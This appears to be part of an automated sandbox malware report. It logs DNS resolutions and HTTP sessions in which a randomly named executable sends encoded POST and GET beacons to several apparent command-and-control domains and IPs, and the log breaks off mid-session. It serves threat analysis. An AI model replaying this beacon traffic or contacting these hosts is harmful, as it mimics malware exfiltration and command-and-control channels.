                                                    Oct 9, 2024 14:00:57.163038969 CEST1.1.1.1192.168.2.90x38c4No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                    Oct 9, 2024 14:00:57.163038969 CEST1.1.1.1192.168.2.90x38c4No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                    Oct 9, 2024 14:01:59.860987902 CEST1.1.1.1192.168.2.90x4d8cNo error (0)www.kovallo.cloudkovallo.cloudCNAME (Canonical name)IN (0x0001)false
                                                    Oct 9, 2024 14:01:59.860987902 CEST1.1.1.1192.168.2.90x4d8cNo error (0)kovallo.cloud81.2.196.19A (IP address)IN (0x0001)false
                                                    Oct 9, 2024 14:02:15.676147938 CEST1.1.1.1192.168.2.90x17f3No error (0)www.030002304.xyz030002304.xyzCNAME (Canonical name)IN (0x0001)false
                                                    Oct 9, 2024 14:02:15.676147938 CEST1.1.1.1192.168.2.90x17f3No error (0)030002304.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                    Oct 9, 2024 14:02:29.162264109 CEST1.1.1.1192.168.2.90x1e6bNo error (0)www.newdaydawning.netnewdaydawning.netCNAME (Canonical name)IN (0x0001)false
                                                    Oct 9, 2024 14:02:29.162264109 CEST1.1.1.1192.168.2.90x1e6bNo error (0)newdaydawning.net44.213.25.70A (IP address)IN (0x0001)false
                                                    Oct 9, 2024 14:02:43.271066904 CEST1.1.1.1192.168.2.90xaf29No error (0)www.coffee-and-blends.info217.160.0.231A (IP address)IN (0x0001)false
                                                    Oct 9, 2024 14:02:56.752389908 CEST1.1.1.1192.168.2.90x136eNo error (0)www.tophm.xyz199.192.21.169A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.kovallo.cloud
                                                    • www.030002304.xyz
                                                    • www.newdaydawning.net
                                                    • www.coffee-and-blends.info
                                                    • www.tophm.xyz

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.94998081.2.196.19806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:01:59.885922909 CEST513OUTGET /koup/?wZBh=UzoT8ph&8T2hn=zjgQ1IglZSD3j4X7Mb/L9VMKC/lioNLyTiYpIFDypb2XxqZYhzfHyCasu3J1FKt+ikpO665Ej+Wn9KB3IEhbZRsyBSNLju/tAMuqMeNka3iE/L9xhA== HTTP/1.1
                                                    Host: www.kovallo.cloud
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Oct 9, 2024 14:02:00.547663927 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 09 Oct 2024 12:02:00 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.94998165.21.196.90806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:15.698322058 CEST778OUTPOST /6uay/ HTTP/1.1
                                                    Host: www.030002304.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.030002304.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 194
                                                    Cache-Control: no-cache
                                                    Referer: http://www.030002304.xyz/6uay/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 31 76 65 75 30 36 4f 74 4d 6b 78 75 39 74 2f 5a 35 4e 53 49 47 49 53 55 66 41 51 52 51 51 46 69 69 30 4f 77 44 78 65 4b 44 75 49 36 7a 37 33 4b 4e 6c 49 59 49 63 45 37 36 77 46 4e 51 41 62 5a 36 4e 64 46 67 38 5a 77 58 63 62 2b 37 7a 47 6e 51 62 33 70 6f 32 2b 51 53 61 56 4c 54 44 33 42 5a 30 6f 4f 76 64 6f 42 77 74 33 67 4a 41 73 58 63 31 2b 61 37 4d 76 59 6b 52 7a 67 32 48 6a 6e 67 37 56 37 48 2f 41 44 73 33 50 77 46 31 64 37 48 62 78 39 53 4a 37 51 6d 4e 72 4c 47 49 37 32 6e 62 34 79 4f 58 50 2f 65 59 6e 41 4a 67 53 68 70 68 77 41 48 6e 39 34 4a 2b 31 63
                                                    Data Ascii: 8T2hn=1veu06OtMkxu9t/Z5NSIGISUfAQRQQFii0OwDxeKDuI6z73KNlIYIcE76wFNQAbZ6NdFg8ZwXcb+7zGnQb3po2+QSaVLTD3BZ0oOvdoBwt3gJAsXc1+a7MvYkRzg2Hjng7V7H/ADs3PwF1d7Hbx9SJ7QmNrLGI72nb4yOXP/eYnAJgShphwAHn94J+1c
                                                    Oct 9, 2024 14:02:16.350398064 CEST1032INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Wed, 09 Oct 2024 12:02:16 GMT
                                                    vary: User-Agent
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.94998265.21.196.90806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:18.249644041 CEST802OUTPOST /6uay/ HTTP/1.1
                                                    Host: www.030002304.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.030002304.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 218
                                                    Cache-Control: no-cache
                                                    Referer: http://www.030002304.xyz/6uay/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 31 76 65 75 30 36 4f 74 4d 6b 78 75 38 4f 6e 5a 37 75 36 49 45 6f 53 54 51 67 51 52 65 77 46 6d 69 31 79 77 44 77 62 52 44 63 63 36 79 61 48 4b 4d 6b 49 59 59 4d 45 37 75 67 46 4d 55 41 62 6f 36 4e 5a 6e 67 39 6c 77 58 63 50 2b 37 33 43 6e 51 49 66 75 6f 6d 2b 53 61 36 56 4a 58 44 33 42 5a 30 6f 4f 76 64 38 37 77 74 76 67 49 7a 30 58 65 58 57 5a 34 4d 76 5a 73 78 7a 67 67 48 6a 6a 67 37 56 6a 48 2b 63 74 73 31 33 77 46 77 5a 37 48 71 78 2b 63 35 37 53 35 39 71 34 42 61 4f 44 6f 36 45 61 42 42 44 71 49 61 2b 6f 44 68 79 2f 34 54 35 62 53 77 39 66 4f 5a 38 30 73 6c 35 2f 6b 2f 34 4b 41 4f 44 42 74 37 56 47 47 78 33 68 45 41 3d 3d
                                                    Data Ascii: 8T2hn=1veu06OtMkxu8OnZ7u6IEoSTQgQRewFmi1ywDwbRDcc6yaHKMkIYYME7ugFMUAbo6NZng9lwXcP+73CnQIfuom+Sa6VJXD3BZ0oOvd87wtvgIz0XeXWZ4MvZsxzggHjjg7VjH+cts13wFwZ7Hqx+c57S59q4BaODo6EaBBDqIa+oDhy/4T5bSw9fOZ80sl5/k/4KAODBt7VGGx3hEA==
                                                    Oct 9, 2024 14:02:18.896882057 CEST1032INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Wed, 09 Oct 2024 12:02:18 GMT
                                                    vary: User-Agent
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.94998365.21.196.90806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:20.795475006 CEST1815OUTPOST /6uay/ HTTP/1.1
                                                    Host: www.030002304.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.030002304.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1230
                                                    Cache-Control: no-cache
                                                    Referer: http://www.030002304.xyz/6uay/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 31 76 65 75 30 36 4f 74 4d 6b 78 75 38 4f 6e 5a 37 75 36 49 45 6f 53 54 51 67 51 52 65 77 46 6d 69 31 79 77 44 77 62 52 44 64 6b 36 79 6f 2f 4b 4e 48 77 59 4b 63 45 37 74 67 46 52 55 41 62 50 36 4c 78 6a 67 39 70 4b 58 5a 4c 2b 36 53 57 6e 41 74 6a 75 6d 6d 2b 53 59 36 56 4b 54 44 33 55 5a 30 34 4b 76 64 73 37 77 74 76 67 49 79 45 58 58 6c 2b 5a 30 73 76 59 6b 52 7a 73 32 48 69 30 67 37 39 7a 48 2f 6f 54 73 6c 58 77 63 51 4a 37 46 34 70 2b 61 70 37 55 34 39 71 67 42 61 53 71 6f 35 68 32 42 42 66 41 49 5a 65 6f 42 30 76 54 37 79 35 57 52 67 35 51 50 5a 67 51 69 56 68 57 6b 63 45 50 52 38 62 7a 31 2b 77 73 4b 53 79 4c 48 4e 68 75 6b 38 75 4f 37 6e 73 37 6b 6f 6b 35 4a 2b 42 46 37 75 57 48 5a 6c 45 78 79 6d 65 6e 4d 68 6a 67 75 6c 63 45 49 77 76 65 37 45 32 2b 41 42 6a 64 78 38 55 4c 41 73 70 69 6b 55 62 4f 6b 47 57 4a 6c 36 6e 4b 68 75 73 41 64 5a 45 52 51 46 31 54 68 47 4c 54 2f 30 46 79 6e 51 75 30 63 47 4c 65 36 75 7a 4e 76 58 5a 33 79 56 51 6c 56 36 76 43 6d 38 52 61 53 56 65 31 [TRUNCATED]
                                                    Data Ascii: 8T2hn=1veu06OtMkxu8OnZ7u6IEoSTQgQRewFmi1ywDwbRDdk6yo/KNHwYKcE7tgFRUAbP6Lxjg9pKXZL+6SWnAtjumm+SY6VKTD3UZ04Kvds7wtvgIyEXXl+Z0svYkRzs2Hi0g79zH/oTslXwcQJ7F4p+ap7U49qgBaSqo5h2BBfAIZeoB0vT7y5WRg5QPZgQiVhWkcEPR8bz1+wsKSyLHNhuk8uO7ns7kok5J+BF7uWHZlExymenMhjgulcEIwve7E2+ABjdx8ULAspikUbOkGWJl6nKhusAdZERQF1ThGLT/0FynQu0cGLe6uzNvXZ3yVQlV6vCm8RaSVe1NEyiWZZSinQiG4auNu2MvwuaCVke/kt51bRx6wxLZbw/3c9cygR14mpx5PnDT1J3nCCVybyrXdR1zohM+uNGvXgwj7OPW7cxMNFiaMwTJmi0eBHop9UmDI7Kcmuk8wvLKQ9miEAfyi2ncq0x+Nsji4SDfwRGfNtiP1uelIq72NFeNKlkdJ4mqdGiYrXPl5zJE0gOaBT7+uJlEuFzT+x2vbR934YGLAlB+z5PROzqtP9Z+rclNVHyknb+/F/cU7KfEaTBQIEIfXNq8zGuNQr1A7blwFU731B7iD78LcPyEuy1ETaiT9uUmEylq+85MNr0uBw6O0ZS5IszA5ZXuihgaQJatYO02u7GoEeUJSONeNy/apoY/dq+Xi+iYikBCm6HMOwDA859jQHOLXHbB7F+GfExF18kfrICTlhA1x5/HcJHS88lLkfeAGRzvt/hnLOV7nbQmpbRmEUjyOTpHScVbj92PB+jDfwgWjWwpuyrZ5BNmzNnxgbmJfyB5lVhOwLWa4BxSpoLpvaC0NVaNgq0aC9hQkxxusNrlQjIDkkhAOG+USFpjoDik9C7ojlwhIAi/+AD4XQBBGHX5a+XiR6H33m3LuSmXYuOLrGnJS05B7CejBhYkMPGb1dczDEVV69D1oxf5GVKjV0U/95F7iofBRhpbRgbNTi+MZ [TRUNCATED]
                                                    Oct 9, 2024 14:02:21.471190929 CEST1032INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Wed, 09 Oct 2024 12:02:21 GMT
                                                    vary: User-Agent
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.94998465.21.196.90806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:23.339941025 CEST513OUTGET /6uay/?8T2hn=4t2O3O+pZmQg6Me57d3wJo6heDIGdjpowWW3Ki6AModP/Z3yDnI8KOs9thhsa1jg844M9/RLYM/vwhOiRdypu3qnYIwYUCnWcXg0sNwBl87ACBA0Bg==&wZBh=UzoT8ph HTTP/1.1
                                                    Host: www.030002304.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Oct 9, 2024 14:02:23.989788055 CEST1032INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Wed, 09 Oct 2024 12:02:23 GMT
                                                    vary: User-Agent
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.94998544.213.25.70806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:29.183646917 CEST790OUTPOST /igaf/ HTTP/1.1
                                                    Host: www.newdaydawning.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.newdaydawning.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 194
                                                    Cache-Control: no-cache
                                                    Referer: http://www.newdaydawning.net/igaf/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 2b 35 42 37 38 31 51 73 38 75 66 69 65 61 63 63 54 65 51 4b 34 75 68 46 64 52 49 48 4a 46 66 61 59 50 6e 71 31 37 4e 59 46 65 45 6f 6b 4f 54 2b 68 6a 49 56 4d 4a 4f 72 38 4b 77 65 7a 72 43 57 48 53 77 51 70 4d 68 58 70 37 75 72 58 6f 54 6b 2f 5a 77 77 51 50 4b 57 6c 2f 4c 6a 33 4c 6a 49 36 37 78 76 6c 43 76 33 75 54 75 45 6a 69 43 46 54 32 55 63 78 32 71 34 5a 71 2f 68 47 6e 6b 73 66 6b 71 72 33 67 70 4e 6e 30 41 69 65 54 61 42 69 65 74 36 4f 39 6c 47 78 44 51 43 50 55 79 48 54 6b 68 4e 62 70 63 56 75 37 30 77 4c 37 47 33 41 31 59 32 76 48 72 69 43 76 79 59
                                                    Data Ascii: 8T2hn=+5B781Qs8ufieaccTeQK4uhFdRIHJFfaYPnq17NYFeEokOT+hjIVMJOr8KwezrCWHSwQpMhXp7urXoTk/ZwwQPKWl/Lj3LjI67xvlCv3uTuEjiCFT2Ucx2q4Zq/hGnksfkqr3gpNn0AieTaBiet6O9lGxDQCPUyHTkhNbpcVu70wL7G3A1Y2vHriCvyY


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.94998644.213.25.70806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:31.733153105 CEST814OUTPOST /igaf/ HTTP/1.1
                                                    Host: www.newdaydawning.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.newdaydawning.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 218
                                                    Cache-Control: no-cache
                                                    Referer: http://www.newdaydawning.net/igaf/
